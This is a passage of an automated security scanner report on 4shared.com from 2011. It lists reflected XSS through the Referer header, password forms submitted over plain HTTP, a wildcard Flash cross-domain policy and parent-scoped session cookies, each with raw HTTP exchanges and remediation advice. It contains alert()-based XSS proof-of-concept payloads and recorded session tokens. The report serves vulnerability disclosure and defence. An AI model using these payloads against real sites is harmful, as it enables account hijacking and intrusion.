Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /js/'%20+%20img%20+%20' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com
Referer: http://www.google.com/search?hl=en&q=b240e--><script>alert(1)</script>0c4c0f593d

Response

HTTP/1.1 404 /js/'%20+%20img%20+%20'
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:03 GMT
Content-Length: 38759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script>alert(1)</script>0c4c0f593d-->
...[SNIP]...

2.123. http://www.4shared.com/js/'%20+%20val%20+%20' [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/'%20+%20val%20+%20'

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload e7758--><script>alert(1)</script>6a2dcbb98ad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /js/'%20+%20val%20+%20' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com
Referer: http://www.google.com/search?hl=en&q=e7758--><script>alert(1)</script>6a2dcbb98ad

Response

HTTP/1.1 404 /js/'%20+%20val%20+%20'
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:02 GMT
Content-Length: 38585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script>alert(1)</script>6a2dcbb98ad-->
...[SNIP]...

3. Cleartext submission of password previous next
There are 4 instances of this issue:

/
/
/enter.jsp
/login.jsp

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

3.1. http://www.4shared.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.4shared.com/index.jsp

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 45901
Date: Fri, 29 Jul 2011 13:56:33 GMT

<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">if (self != top) {top.location = self.location; }</script>
<title>4shared.com - free file sharing and s
...[SNIP]...
<div>
<form action="http://www.4shared.com/index.jsp" method="post" class="openid">

<div class="small alert" id="loginRejectReason" style="display:none;">
...[SNIP]...
<br>
<input id="passfield" name="password" type="password" class="f"
value=""><br/>
...[SNIP]...

3.2. http://www.4shared.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.4shared.com/index.jsp

The form contains the following password fields:

password
password2

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 45901
Date: Fri, 29 Jul 2011 13:56:33 GMT

<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">if (self != top) {top.location = self.location; }</script>
<title>4shared.com - free file sharing and s
...[SNIP]...
<div style="padding:9px;">
<form name="signUpForm" action="http://www.4shared.com/index.jsp" method="post" class="openid">
<input type="hidden" name="sId" value="f5uzfaHd0sNGJlVU" />
...[SNIP]...
<td><input type="password" name="password" id="regpassfield" class="regfield xBox" style="width:200px" ></td>
...[SNIP]...
<td><input type="password" name="password2" id="regpassfield2" class="regfield xBox" style="width:200px" ></td>
...[SNIP]...

3.3. http://www.4shared.com/enter.jsp previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/enter.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.4shared.com/enter.jsp

The form contains the following password field:

password

Request

GET /enter.jsp?sId=Sdt45IRrRqsiuJEj&&fau=1&ausk=Sdt45IRrRqsiuJEj&au=1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 35973
Date: Fri, 29 Jul 2011 13:57:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login or S
...[SNIP]...
<br />
<form name="loginForm" action="/enter.jsp" method="post" class="openid">
<input type="hidden" name="afp" value=""/>
...[SNIP]...
<td class="alignLeft">
<input id="passfield" name="password" type="password"
class="fieldhint"
value="********"
style="width:210px" onfocus="clearPassword();" onblur="showPassword();"/>
<div class="capsWarning small red" style="display: none; width:210px">
...[SNIP]...

3.4. http://www.4shared.com/login.jsp previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/login.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.4shared.com/index.jsp

The form contains the following password field:

password

Request

GET /login.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: fp=4sess_p50722b1a_t20110729-145755_; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 27078
Date: Fri, 29 Jul 2011 13:57:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login</title>
<met
...[SNIP]...
<br />
<form name="theForm" action="/index.jsp" method="post" class="openid">
<input type="hidden" name="afp" value=""/>
...[SNIP]...
<td>
<input type="password" name="password" id="passfield" class="field" style="width:250px" value="" onkeydown="if (event.keyCode==13){document.theForm.submit();}"/>
<div class="capsWarning small red" style="display: none;width:250px">
...[SNIP]...

4. Flash cross-domain policy previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/xml
Date: Fri, 29 Jul 2011 13:56:35 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.4shared.com" />
<allow-access-from domain="*.4shared-china.com" />
<allow-access-from domain="*.4s.io" />
<allow-access-from domain="*.rumusic.org" />
<allow-access-from domain="*.19de9e7959fdb976322649b8.com" />
...[SNIP]...

5. Cookie scoped to parent domain previous next
There are 14 instances of this issue:

/favicon.ico
/icons/16x16/default.png
/images/spacer.gif
/js/Jsonp.js
/js/homeScript.jsp
/js/loginScript.jsp
/js/plupload/plupload.flash.js
/js/plupload/plupload.js
/js/plupload/plupload.silverlight.js
/js/signup-script.jsp
/sla.jsp
/enter.jsp
/premium.jsp
/signup.jsp

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

5.1. http://www.4shared.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.4shared.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; day1host=h; WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; hostid=263556618; __utma=210074320.358922166.1311948340.1311948340.1311948340.1; __utmb=210074320.0.10.1311948340; __utmc=210074320; __utmz=210074320.1311948340.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-217047336-1311948341109

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
ETag: W/"1150-1295256540000"
Last-Modified: Mon, 17 Jan 2011 09:29:00 GMT
Content-Length: 1150
Date: Fri, 29 Jul 2011 14:08:28 GMT

............ .h.......(....... ..... ....................................................................
............................................................sT..oQ.....4...................
..
...[SNIP]...

5.2. http://www.4shared.com/icons/16x16/default.png previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/icons/16x16/default.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; Domain=.4shared.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/16x16/default.png HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; Domain=.4shared.com; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:57:01 GMT
ETag: W/"416-1311851860000"
Last-Modified: Thu, 28 Jul 2011 11:17:40 GMT
Content-Type: image/png
Content-Length: 416
Date: Fri, 29 Jul 2011 13:57:00 GMT

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx....J.@..g&...M.....KP|.....x./mR.'...".....L.....&.,....ag&;...n...i4z.^.[.e.P7.....qq.....s......8....A. Nu..t.|...<_%.
...[SNIP]...

5.3. http://www.4shared.com/images/spacer.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/images/spacer.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/spacer.gif HTTP/1.1
Host: www.4shared.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
Cookie: JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:25 GMT; Path=/
Set-Cookie: WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/
Set-Cookie: hostid=-720656152; Expires=Mon, 26-Jul-2021 14:05:25 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:05:25 GMT
ETag: W/"43-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 43
Date: Fri, 29 Jul 2011 14:05:25 GMT

GIF89a.............!.......,...........D..;

5.4. http://www.4shared.com/js/Jsonp.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/js/Jsonp.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/Jsonp.js?ver=5756 HTTP/1.1
Host: www.4shared.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
Cookie: JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:25 GMT
ETag: W/"720-1303901808000"
Last-Modified: Wed, 27 Apr 2011 10:56:48 GMT
Content-Type: text/javascript
Content-Length: 720
Date: Fri, 29 Jul 2011 14:08:25 GMT

function Jsonp(options) {
options = $.extend(true, {
url: '',
jsonp: function() { }
}, options)

var id = Math.random()
options.url = options.url + (options.url.indexOf("?") > 0 ? '&'
...[SNIP]...

5.5. http://www.4shared.com/js/homeScript.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/js/homeScript.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

WWW_JSESSIONID=00339AC45B50830C2A985D9B562FA591.dc329; Domain=.4shared.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/homeScript.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=00339AC45B50830C2A985D9B562FA591.dc329; Domain=.4shared.com; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:58 GMT
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 44840
Date: Fri, 29 Jul 2011 14:09:58 GMT

var i=1;
var ua = navigator.userAgent;
var opera = /opera [56789]|opera\/[56789]/i.test(ua);
var ie = !opera && /MSIE/.test(ua);
var ie50 = ie && /MSIE 5\.[
...[SNIP]...

5.6. http://www.4shared.com/js/loginScript.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/js/loginScript.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/loginScript.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/javascript
Content-Length: 1346
Date: Fri, 29 Jul 2011 14:08:22 GMT

function clearLogin(){
var field=document.getElementById('loginfield');
if (field.value=="your e-mail") {
field.value="";
field.className = field.className.replace("fieldhint
...[SNIP]...

5.7. http://www.4shared.com/js/plupload/plupload.flash.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/js/plupload/plupload.flash.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plupload/plupload.flash.js HTTP/1.1
Host: www.4shared.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
Cookie: JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:26 GMT; Path=/
Set-Cookie: WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/
Set-Cookie: hostid=1152470595; Expires=Mon, 26-Jul-2021 14:05:26 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:05:26 GMT
ETag: W/"11860-1302522786000"
Last-Modified: Mon, 11 Apr 2011 11:53:06 GMT
Content-Type: text/javascript
Content-Length: 11860
Date: Fri, 29 Jul 2011 14:05:26 GMT

/**
* plupload.flash.js
*
* Copyright 2009, Moxiecode Systems AB
* Released under GPL License.
*
* License: http://www.plupload.com/license
* Contributing: http://www.plupload.com/contri
...[SNIP]...

5.8. http://www.4shared.com/js/plupload/plupload.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.4shared.com
Path:	/js/plupload/plupload.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

